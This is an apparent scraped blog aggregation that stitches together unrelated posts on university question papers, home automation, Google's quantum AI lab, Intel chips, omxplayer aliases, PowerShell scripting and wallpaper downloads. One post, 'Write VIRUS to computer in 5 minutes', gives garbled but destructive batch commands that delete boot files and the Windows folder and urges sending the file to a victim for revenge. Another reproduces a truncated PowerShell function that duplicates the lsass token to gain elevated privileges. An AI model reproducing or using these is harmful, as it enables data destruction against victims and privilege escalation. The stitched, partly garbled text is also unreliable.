TYBSC IT Sem V Question Papers 2009 Mumbai University

Below is the collection of TY BSc IT Sem V Papers (2009) of Mumbai University.
Click on the corresponding links to download the papers.
If you have any Question papers to share, click here to publish in this site.

  • Nov 2009 SQL2 - Submitted by Rupak aka Assassin


Click here to Download Question papers of previous years

If you have any Question papers to share, click here to publish in this site.
Read More..

Home automation update

Last year I wrote about my first entry into the field of home automation and the Internet of Things. My first purchase was a combined motion sensor, video camera and Z-Wave hub that can control switches or lights remotely. The device, called Piper, also has sensors for temperature, light, and sound and contains a security siren. I then added some Belkin Wemo LED lights, that required a separate controller and then some OSRAM Lightify LED bulbs and light strips that required their own controller. Ok so now things were getting rather complex with three separate controllers controlling different things. This really reflects the state of the home automation market with many competing standards fighting for dominance; such as: Z-Wave, ZigBee, Hue, Wemo, and even Google and Apple now entering the fray.
   I then came across something called Smartthings that can talk to most of the different automation standards allowing a single controller to automate a wide variety of devices. Of particular interest to me also was that it supports open-source code allowing developers to make their own "SmartApps" for their own needs. which then they can share with the Smartthings community. For example, somebody might make a SmartApp to always ensure that the garage door is closed at sunset. Somebody else might make a SmartApp to turn on the irrigation system at Sunset for one hour, but only if it hasnt rained in the previous day. I now have a Smartthings hub controlling a variety of lights, a motion sensor, garage door opener, and video door bell. My favourite functionality is being told if the garage door is open if Ive left home and being able to remotely close it. The Ring video doorbell that lets me see whos at the front door and talk to them, even when Im not at home, is pretty cool as well.

from The Universal Machine http://universal-machine.blogspot.com/

IFTTT

Put the internet to work for you.

Turn off or edit this Recipe

Read More..

Very easy to download youtube videos audio mp3 format



you can easily download youtube videos MP3 format
So we have a video from Youtube, download video format but do not format audio. Many mega bytes audio save you a good opportunities for those who want to download format. Assume whatever tips you know.
First go to this link Click to download youtube videos in mp3 format, you will see this picture shown bellow-



Then mark the red spot in the box and paste the link to your youtube video and then click download.
Then a few second you will verify the link and download will start automatically.  


 
Read More..

Write VIRUS to computer in 5 minutes

1) Creating virus trick
open ur notepad n type the following.........

type del c: oot.ini c:del autoexec.batsave as .exe[save it as .exe file....n u can save it by ne name]
create the notepad in c: drive...


2)
Note: but with in seconds harddisk get damaged

create Virus in 5 minutes.......
Very easy but dangerous VirusOk, now, the trick:
The only thing you need is Notepad.
Now, to test it, create a textfile called TEST.txt(empty)
in C:Now in your notepad type "erase C:TEST.txt" (without the quotes).
Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C: and youll see your Test.txt is gone.
Now, the real work begins:Go to Notpad and
type erase C:WINDOWS (or C:LINUX if you have linux) and
save it again as findoutaname.cmd.
Now DONT run the file or youll lose your WINDOWS map.
So, thats the virus. Now to take revenge.
Send you file to your victim.
Once she/he opens it. Her/his WINDOWS/LINUX map is gone.
And have to install LINUX/WINDOWS again.
Simple explanation:Go to notepad, type erase C:WINDOWS, save,
send to victim, once the victim opens it,
the map WINDOWS will be gone and have to install WINDOWS again...
HEY I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!AGAIN :I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

be aware of this..its a simple but a strong virus that can delete anyones window os through email ..ok
i am not at all responsible for any of the further cause
Read More..

PowerShell v3 Windows Management Framework 3 0

In case you are not a follower of the Twitter lines news of the Windows Management Framework 3.0 officially dropped today. I spotted it shortly after it went live and already downloaded/installed the framework. Note, it does require a hard reboot, so, be prepared, if you are going to pull it down, thats in the path to getting to the new goodies:

  • Windows Management Framework 3.0


Read More..

HD Dark Desktop Background Wallpapers Download

To save the image, first click to enlarge the image, then right-click on it and click on Save Image As.. or simply right-click on the thumbnail and click on Save Link AS..
Note: all are high resolution images greater than 1024 x 728 px.



3D RenderDark Night AngelsDark Night Angels

Linkin Park Group HD WallpaperWindows 7 HD wallpaperBlack HD Wallpaper

Audi R Zero WallpaperDC Black Wallpaper HDBlack Cat Wallpaper

WDKCL Dark Background Wallpaper
Read More..

Launching the Quantum Artificial Intelligence Lab



We believe quantum computing may help solve some of the most challenging computer science problems, particularly in machine learning. Machine learning is all about building better models of the world to make more accurate predictions. If we want to cure diseases, we need better models of how they develop. If we want to create effective environmental policies, we need better models of what’s happening to our climate. And if we want to build a more useful search engine, we need to better understand spoken questions and what’s on the web so you get the best answer.

So today we’re launching the Quantum Artificial Intelligence Lab. NASA’s Ames Research Center will host the lab, which will house a quantum computer from D-Wave Systems, and the USRA (Universities Space Research Association) will invite researchers from around the world to share time on it. Our goal: to study how quantum computing might advance machine learning.

Machine learning is highly difficult. It’s what mathematicians call an “NP-hard” problem. That’s because building a good model is really a creative act. As an analogy, consider what it takes to architect a house. You’re balancing lots of constraints -- budget, usage requirements, space limitations, etc. -- but still trying to create the most beautiful house you can. A creative architect will find a great solution. Mathematically speaking the architect is solving an optimization problem and creativity can be thought of as the ability to come up with a good solution given an objective and constraints.

Classical computers aren’t well suited to these types of creative problems. Solving such problems can be imagined as trying to find the lowest point on a surface covered in hills and valleys. Classical computing might use what’s called “gradient descent”: start at a random spot on the surface, look around for a lower spot to walk down to, and repeat until you can’t walk downhill anymore. But all too often that gets you stuck in a “local minimum” -- a valley that isn’t the very lowest point on the surface.

That’s where quantum computing comes in. It lets you cheat a little, giving you some chance to “tunnel” through a ridge to see if there’s a lower valley hidden beyond it. This gives you a much better shot at finding the true lowest point -- the optimal solution.

We’ve already developed some quantum machine learning algorithms. One produces very compact, efficient recognizers -- very useful when you’re short on power, as on a mobile device. Another can handle highly polluted training data, where a high percentage of the examples are mislabeled, as they often are in the real world. And we’ve learned some useful principles: e.g., you get the best results not with pure quantum computing, but by mixing quantum and classical computing.

Can we move these ideas from theory to practice, building real solutions on quantum hardware? Answering this question is what the Quantum Artificial Intelligence Lab is for. We hope it helps researchers construct more efficient and more accurate models for everything from speech recognition, to web search, to protein folding. We actually think quantum machine learning may provide the most creative problem-solving process under the known laws of physics. We’re excited to get started with NASA Ames, D-Wave, the USRA, and scientists from around the world.
Read More..

Syrias children learn to code with the Raspberry Pi

Three years ago, when I was looking for an example of social unrest to highlight the use of social media as a communication tool for protestors in my book, I chose the then new uprising in Syria. Im horrified the conflict still continues. However, I just came across a surprisingly good piece of news from that awful conflict; the use of the Raspberry Pi to teach Syrian refugees in Lebanon to code. Read the full article in the Guardian to learn more.

from The Universal Machine http://universal-machine.blogspot.com/

IFTTT

Put the internet to work for you.

Turn off or edit this Recipe

Read More..

Intel Nehalem Launch

Intel Nehalem LaunchIntel appears to be preparing the launch of the newest security chip, which according to the plan will be ready in August to come. Latest Intel processor chip will implement this architecture Nehalem design with a more promising performance for all types of computers, from laptops, desktop to server.The latest chip technology from Intel is designed to be able to overcome the bottleneck problem that is very in the performance of each processor. In addition, this technology also Nehalem chip can execute more tasks to the needs of the power consumption is lower.

According to Digitimes, the chip giant will begin implementing the micro-architecture design of a new series on this new desktop and laptop on board, starting in September is akan datang. Intel will launch the desktop quad-core processor with the code-name Lynnfield in early September, then followed with a laptop processor with quad-core code-name Clarksfield on next weekend. This second processor, the Lynnfield and Clarksfield are made with 45 nanometer technology practice, the next plan will make it to the Intel 32 nanometer technology.

In addition, Intel will also launch the processor chip for the newest class ultra thin laptop, the SU2300 and Celeron Celeron 743 in September to come

What about you Intel Nehalem Launch
Read More..

Running omxplayer from the command line easily using alias

Although I have previously written about running omxplayer via GUI, sometimes I like to control it via command line.
However, since I have my raspberry pi hooked up via HDMI and I like the show to be fullscreened, this requires typing:
omxplayer -r -o hdmi FILE
each time.
In order to make this easier we can use aliases. An alias lets you run a command with a shorter command. For instance:
ll is really an alias of ls - l

You can see what aliases you have by typing alias in the command line.
To temporarily add an alias you can use the command:
alias play=omxplayer -r -o hdmi

However, I want to permanently add this. To do that, Ill edit /home/pi/.bash_aliases
you can do this using vim or nano. Simply add the line alias play=omxplayer -r -o hdmi to this file.

Make sure you log out and log back in for this change to be made. Now we can just type: 

play FILE

To be able to easily find and intelligently play videos automatically, see this page:
http://stevenhickson.blogspot.com/2013/03/playing-videos-intelligently-with.html

Consider donating to further my tinkering.


Places you can find me
Read More..

PowerShell v2 Tracking Down Registry Tweaks

Heres an example of how I took an action and tracked down the underlying information used to configuration the user interface. To help automate some of our internal processes I was tasked with finding ways to make PowerShell a component of our provisioning toolkit. In this case I wanted to change the default display for the control panel View by preference from Large icons to Small icons.

I could have spent a ton of time tracking down the key on Google, but, I prefer to use Sysinternals tools instead. First, I fired up Process Monitor with the Control Panel open. Once Process Monitor was capturing I simply clicked the Include Process from Window icon



and highlighted the inner window of the Control Panel.  After making my change I saw a few entries pop up in Process Explorer.  Flipping back I saw the path I needed to focus on.


Using this path I simply opened regedit, tweaked the values to test.


Once I was sure this was my key, I wrote the following function in PowerShell to handle it for my script. Note that this is profile dependent (HKCU).
function Set-ControlPanelViewToSmallIcons
{
 Write-Output "$(Write-TimeStamp): Attempting to set Control Panel View to `"Small Icons`"."
 if((Get-ItemProperty -Path "HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerControlPanel" -Name AllItemsIconView).AllItemsIconView -eq 1)
 {
  Write-Output "$(Write-TimeStamp): Control Panel View already set to `"Small Icons`"."
 }
 else
 {
  Write-Output "$(Write-TimeStamp): Control Panel View not set to `"Small Icons`". Attempting to set now."
  Set-ItemProperty -Path "HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerControlPanel" -Name AllItemsIconView -Value 1

  Write-Output "$(Write-TimeStamp): Validating Control Panel View has been set to `"Small Icons`"."
  if((Get-ItemProperty -Path "HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerControlPanel" -Name AllItemsIconView).AllItemsIconView -eq 1)
  {
   Write-Output "$(Write-TimeStamp): Control Panel View has been updated to `"Small Icons`"."
  }
  else
  {
   Write-Error "$(Write-Error): Control Panel View was not set to `"Small Icons`". Cancelling processing."
  }
 }
}
In the example above, $(Write-Error) is just a wrapper function for Get-Date -Format yyyyMMddHHmmss. 

Together Sysinternals tools and PowerShell can go a long way.  This is a very simple illustration of an other wise tedious and time-consuming process reduced to about a 3 minute task thanks to the right tools.
Read More..

PowerShell v3 Enable TSDuplicateToken

To be clear, this is not my code. I merely want to have it readily accessible in case I need it later. The original post came from Niklas Goudes post on the Scripting Guys blog,
Use PowerShell to Duplicate Process Tokens via P/Invoke
I added this to my dot sourced function directory so I can use it on an as needed basis to get an elevated shell. So, again, not my code, just a great function found here:
Enable-TSDuplicateToken
Works perfectly on Windows 7,
function Enable-TSDuplicateToken {
<#
  .SYNOPSIS
  Duplicates the Access token of lsass and sets it in the current process thread.

  .DESCRIPTION
  The Enable-TSDuplicateToken CmdLet duplicates the Access token of lsass and sets it in the current process thread.
  The CmdLet must be run with elevated permissions.

  .EXAMPLE
  Enable-TSDuplicateToken

  .LINK
  http://www.truesec.com

  .NOTES
  Goude 2012, TreuSec
#>
[CmdletBinding()]
param()

$signature = @"
    [StructLayout(LayoutKind.Sequential, Pack = 1)]
     public struct TokPriv1Luid
     {
         public int Count;
         public long Luid;
         public int Attr;
     }

    public const int SE_PRIVILEGE_ENABLED = 0x00000002;
    public const int TOKEN_QUERY = 0x00000008;
    public const int TOKEN_ADJUST_PRIVILEGES = 0x00000020;
    public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;

    public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
    public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
    public const UInt32 TOKEN_DUPLICATE = 0x0002;
    public const UInt32 TOKEN_IMPERSONATE = 0x0004;
    public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
    public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;
    public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080;
    public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100;
    public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY);
    public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY |
      TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |
      TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |
      TOKEN_ADJUST_SESSIONID);

    public const string SE_TIME_ZONE_NAMETEXT = "SeTimeZonePrivilege";
    public const int ANYSIZE_ARRAY = 1;

    [StructLayout(LayoutKind.Sequential)]
    public struct LUID
    {
      public UInt32 LowPart;
      public UInt32 HighPart;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct LUID_AND_ATTRIBUTES {
       public LUID Luid;
       public UInt32 Attributes;
    }


    public struct TOKEN_PRIVILEGES {
      public UInt32 PrivilegeCount;
      [MarshalAs(UnmanagedType.ByValArray, SizeConst=ANYSIZE_ARRAY)]
      public LUID_AND_ATTRIBUTES [] Privileges;
    }

    [DllImport("advapi32.dll", SetLastError=true)]
     public extern static bool DuplicateToken(IntPtr ExistingTokenHandle, int
        SECURITY_IMPERSONATION_LEVEL, out IntPtr DuplicateTokenHandle);


    [DllImport("advapi32.dll", SetLastError=true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    public static extern bool SetThreadToken(
      IntPtr PHThread,
      IntPtr Token
    );

    [DllImport("advapi32.dll", SetLastError=true)]
     [return: MarshalAs(UnmanagedType.Bool)]
      public static extern bool OpenProcessToken(IntPtr ProcessHandle, 
       UInt32 DesiredAccess, out IntPtr TokenHandle);

    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool LookupPrivilegeValue(string host, string name, ref long pluid);

    [DllImport("kernel32.dll", ExactSpelling = true)]
    public static extern IntPtr GetCurrentProcess();

    [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
     public static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall,
     ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen);
"@

  $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
  if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) {
    Write-Warning "Run the Command as an Administrator"
    Break
  }

  Add-Type -MemberDefinition $signature -Name AdjPriv -Namespace AdjPriv
  $adjPriv = [AdjPriv.AdjPriv]
  [long]$luid = 0

  $tokPriv1Luid = New-Object AdjPriv.AdjPriv+TokPriv1Luid
  $tokPriv1Luid.Count = 1
  $tokPriv1Luid.Luid = $luid
  $tokPriv1Luid.Attr =[AdjPriv.AdjPriv]::SE_PRIVILEGE_ENABLED

  $retVal = $adjPriv::LookupPrivilegeValue($null, "SeDebugPrivilege", [ref]$tokPriv1Luid.Luid)

  [IntPtr]$htoken = [IntPtr]::Zero
  $retVal = $adjPriv::OpenProcessToken($adjPriv::GetCurrentProcess(), [AdjPriv.AdjPriv]::TOKEN_ALL_ACCESS, [ref]$htoken)
  
  
  $tokenPrivileges = New-Object AdjPriv.AdjPriv+TOKEN_PRIVILEGES
  $retVal = $adjPriv::AdjustTokenPrivileges($htoken, $false, [ref]$tokPriv1Luid, 12, [IntPtr]::Zero, [IntPtr]::Zero) <
Read More..

Don Jones Month of Lunches Day 7

The original link can be found at: http://powershell.com/cs/blogs/donjones/archive/2012/03/05/will-day-7.aspx
Chapter 7 gets into the pipeline deeper to clear up a lot of things.  I still have a hard time with some of the concepts I have avoided day to day.  Pipelines took me a while to grasp, and, I certainly dont understand them completely yet.  As an aside, I think of commands (and scripts) as small machines to automate tasks.  This helps me visualize the concept a little better.  The old crank engines on Ford Model Ts specifically come to mind. With each crank the cylinders go down and up.  Using this mental model I see the operating system cranking on one thing-the pipeline object-at a time in sequential fashion.  That, to me, is one of the clearest ways to explain the pipeline.  I dont know if this will help anyone else, but, it just gave me a real tangible image to work with.

I still struggle with are ByValue (Section 7.2) and ByPropertyName (Section 7.3).  Although I worked through the examples in the book it does not fully make sense.   Don gave a great explanation, but, I suspect this will be something I need to use a bit until it clicks.   Normally my brain just "gets" things.  When it does not, I have to work pretty hard to figure them out.  Then, all of the sudden, I get it.  One of the fun parts of being an intuitive person in a logical trade.  To distract myself I tried to come up with a function to list all of the Cmdlets and specific parameters that take pipeline values ByValue and ByPropertyName, however, that proved to be unproductive.  Perhaps later it too will come to me.  So, back to work.

Finding a weak spot does not make me terribly happy.  However, part of the reason I felt doing the Month of Lunches was to do a full review of PowerShell fundamentals so I could uncover holes. While not getting this distinction certainly is not a show stopper it show see what I need to work on so I can go back and focus on the gaps in my knowledge base with a little TLC.  I did like the section on using parentheses.  A simple technique used by a lot of more experienced PowerShell I follw use is to wrap something in parentheses as an argument.  For a while, I had been using the cmdlet-pipe-foreach pattern.  That is the long way around the block.  Just use the parentheses; by order of precedence these are interpreted first.  Once the output of these cmdlets returns it gets passed to the parameter as arguments.  Less work, more results.

I enjoyed the sections on creating new AD users.  It took me a little while to get what the difference being highlighted in Sections 7.5 and 7.6.  A while back I learned about using expressions with Select and found that to be just plain awesome.  At first I thought the issue was that there were some pieces of data in the wrong columns.  I kept studying the two lists wondering what I was missing.  Then, as I worked through the second example I finally spotted the difference being with the csv headers, not, with the data.  All of the sudden I was not preoccupied with some magic I was not seeing, and, simply shook it off as something obvious I was not paying attention to.

I still have not found a clear approach on how to use parentheses to retrieve arguments to pass to  parameters.  Looking back over what was covered in Sections 7.2-7.4 I suspect the answer rests in understanding ByValue and ByPropertyName.  I hesitate to use this obscure example, but, it encapsulates something I learned in this chapter.   I want to use Trace-Command (a really deep dive cmdlet), but, I hate using TraceSources with Console in the Name.  The console goes nuts.  I tried to find a workaround to exclude specific TraceSources.  I was only able to do this after I examined the output of my command.  I was trying to pass PSTraceSource objects to the -Name parameter when it really wanted strings.  By looking more closely at the help (to see the expected type) and using Get-Member (to identify what was sent) it became clear, and, so did my solution.

Yeah, Will, I gotta admit I still struggle to teach pipeline binding, too. In the 2nd edition of the book (for v3) Ill probably try a different approach yet again. Its just a touch concept. But parentheses dont depend at all on ByValue or ByPropertyName. Consider Get-WmiObject -class Win32_BIOS -computername (xxx). The "xxx" can be replaced by any expression that produces a collection of String objects (since youve got some programming experience, Im comfortable using that terminology). E.g., (a) Get-Content names.txt (b) Get-ADComputer -filter * | Select -expand Name, etc. So long as the parenthetical expression produces a collection of objects, and those objects are acceptable to the parameter (-computerName accepts a String), then itll work. Hope that helps...
Read More..

Largest collection of Google Logos on the web Set 7

Set1 Set2 Set3 Set4 Set5 Set6 Set7 Set8 Set9 Set10

Largest Collection of Google Logos


Google Logos 249Google Logos 251Google Logos 254


Google Logos 255Google Logos 256Google Logos 258


Google Logos 259Google Logos 260Google Logos 262


Google Logos 264Google Logos 266Google Logos 268


Google Logos 270Google Logos 271Google Logos 272


Google Logos 273Google Logos 274Google Logos 277

Google Logos 276Google Logos 278Google Logos 280



Google Logos 281Google Logos 282Google Logos 284


Google Logos 285Google Logos 287Google Logos 289
Google Logos 290Google Logos 292Google Logos 294


Google Logos 296Google Logos 297Google Logos 298

Set1 Set2 Set3 Set4 Set5 Set6 Set7 Set8 Set9 Set10

Read More..